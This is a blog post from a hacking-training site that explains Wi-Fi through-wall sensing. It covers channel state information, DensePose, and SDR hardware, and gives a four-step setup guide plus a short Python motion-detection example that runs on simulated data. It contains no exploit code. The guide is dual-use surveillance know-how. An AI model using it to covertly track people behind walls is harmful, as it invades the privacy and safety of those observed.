It might seem like science fiction, but now we have the capability to “see” through walls and track the location and movement of targets. This is thanks to new technological developments in both artificial intelligence and SDR. Remember, Wi-Fi is simply sending and receiving radio signals at 2.45 GHz. If an object is in the way of the signal, it bounces, bends and refracts the signal. This perturbing of the signal can be very complex, but advances in machine learning (ML) and AI now make it possible to collect and track those changes in the signal and determine if it’s a human, dog, or an intruder. This is the beginning of something exciting and, quite possibly, malicious.

This is one more reason why we say that SDR (Signals Intelligence) for Hackers is the leading edge of cybersecurity!

The Science Behind Wi-Fi Sensing

How It Works

  • Wi-Fi signals are electromagnetic waves that can pass through common wall materials like drywall, wood, and even concrete (with some signal loss).
  • When these signals encounter objects, especially humans, they reflect, scatter, and diffract.
  • By analyzing how Wi-Fi signals bounce back, it’s possible to detect the presence, movement, and even the shape of people behind walls.

Key Concepts

  • Phase and Amplitude: The changes in phase and amplitude of the Wi-Fi signal carry information about what the signal has encountered.
  • Multipath Propagation: Wi-Fi signals reflect off multiple surfaces, producing a complex pattern that can be decoded to reveal movement and location.
  • DensePose & Neural Networks: Modern systems use AI to map Wi-Fi signal changes to specific points on the human body, reconstructing pose and movement in 3D.

The Hardware

You don’t need military-grade gear. Here’s what’s commonly used:

  • Standard Wi-Fi Routers: Most experiments use commodity routers with multiple antennas.
  • Software-Defined Radios (SDRs): For more control and precision, SDRs like the HackRF or USRP can be used (see our tutorials and trainings on SDR for Hackers).
  • Multiple Antennas: At least two, but three or more improves accuracy and resolution.

The Software

Data Collection

  • Transmit & Receive: One device sends out Wi-Fi signals, another listens for reflections.
  • Channel State Information (CSI): This is the raw data showing how signals have changed after bouncing off objects.

Processing

  • Signal Processing: Algorithms filter out static objects (walls, furniture) and focus on moving targets (people).
  • Neural Networks: AI models such as DensePose map signal changes to body coordinates, reconstructing a “pose” for each detected person.

Wi-Fi Sensing in Action

Step 1: Set Up Your Equipment

  • Place a Wi-Fi transmitter and receiver on opposite sides of the wall.
  • Ensure both devices can log CSI data. Some routers can be flashed with custom firmware (e.g., OpenWRT) to access this.

Step 2: Collect CSI Data

  • Use tools like Atheros CSI Tool or Intel 5300 CSI Tool to capture the raw signal data.
  • Move around on the far side of the wall to generate reflections.

Step 3: Process the Data

  • Use Python libraries or MATLAB scripts to process the CSI data.
  • Apply filters to remove noise and static reflections.
  • Feed the cleaned data into a pre-trained neural network (like DensePose) to reconstruct human poses.

Step 4: Visualize the Results

  • The output can be a 2D or 3D “stick figure” or heatmap showing where people are and how they’re moving.
  • Some setups can even distinguish between individuals based on movement patterns.
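
The filtering part of Step 3 can be tried without any radio hardware. The following is an added example, not code from the original post or from any CSI tool: it builds constructed CSI amplitudes, subtracts a slowly adapting background to remove static reflections, and flags frames whose remaining energy indicates movement. All function names, parameters and the threshold are assumptions, and no pose reconstruction is attempted.

```python
import math


def make_csi(frames=120, subcarriers=8, motion=(50, 80)):
    """Constructed CSI amplitudes: static multipath plus one moving reflector."""
    data = []
    for t in range(frames):
        row = []
        for k in range(subcarriers):
            static = 10.0 + 0.5 * k                      # walls and furniture
            jitter = 0.05 * math.sin(1.7 * t + 0.9 * k)  # small receiver noise
            moving = 0.0
            if motion[0] <= t < motion[1]:               # someone walking in the room
                moving = 1.5 * math.sin(0.6 * t + 0.4 * k)
            row.append(static + jitter + moving)
        data.append(row)
    return data


def remove_static(csi, alpha=0.05):
    """Subtract a per-subcarrier background tracked by an exponential moving average."""
    background = list(csi[0])
    residual = []
    for row in csi:
        residual.append([a - b for a, b in zip(row, background)])
        background = [(1 - alpha) * b + alpha * a for a, b in zip(row, background)]
    return residual


def motion_energy(residual, window=5):
    """Mean squared residual across subcarriers, averaged over a sliding window."""
    per_frame = [sum(v * v for v in row) / len(row) for row in residual]
    smoothed = []
    for i in range(len(per_frame)):
        chunk = per_frame[max(0, i - window + 1): i + 1]
        smoothed.append(sum(chunk) / len(chunk))
    return smoothed


def detect_motion(csi, threshold=0.2):
    """Return the indices of frames where movement is detected."""
    energy = motion_energy(remove_static(csi))
    return [i for i, e in enumerate(energy) if e > threshold]


if __name__ == "__main__":
    hits = detect_motion(make_csi())
    print(f"movement detected in frames {hits[0]}..{hits[-1]}")
```

Because the background adapts slowly, a person who stops moving eventually becomes part of the static estimate, so this approach detects movement rather than presence.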

Limitations and Considerations

  • Wall Material: Thicker or metal-reinforced walls reduce accuracy.
  • Privacy: This technology raises major privacy concerns—anyone with the right tools could potentially “see” through your walls.
  • Legality: Unauthorized use of such technology may violate laws or regulations.

Real-World Applications

  • Security: Detecting intruders or monitoring restricted areas. Companies like TruShield are offering commercial home security systems based upon this technology.
  • Elder Care: Monitoring movement for safety without cameras.
  • Smart Homes: Automating lighting or HVAC based on occupancy.
  • Law Enforcement: Law enforcement agencies can detect and track suspects in their homes.
  • Intelligence Agencies: Can use this technology to track spies or other suspects.

Summary

Wi-Fi sensing is a powerful, rapidly advancing field. With basic hardware (HackRF) and open-source tools, it’s possible to experiment with through-wall detection. This opens a whole new horizon in Wi-Fi Hacking and SDR for Hackers.

For more on this technology, attend our upcoming Wi-Fi Hacking training, July 22-24. If you are interested in building this device, look for our 2026 SDR for Hackers training.

As always, use this knowledge responsibly and be aware of the ethical and legal implications.

The post Can Hackers “See” Inside Your Home Using Wi-Fi to Track Your Location and Movement? first appeared on Hackers Arise.
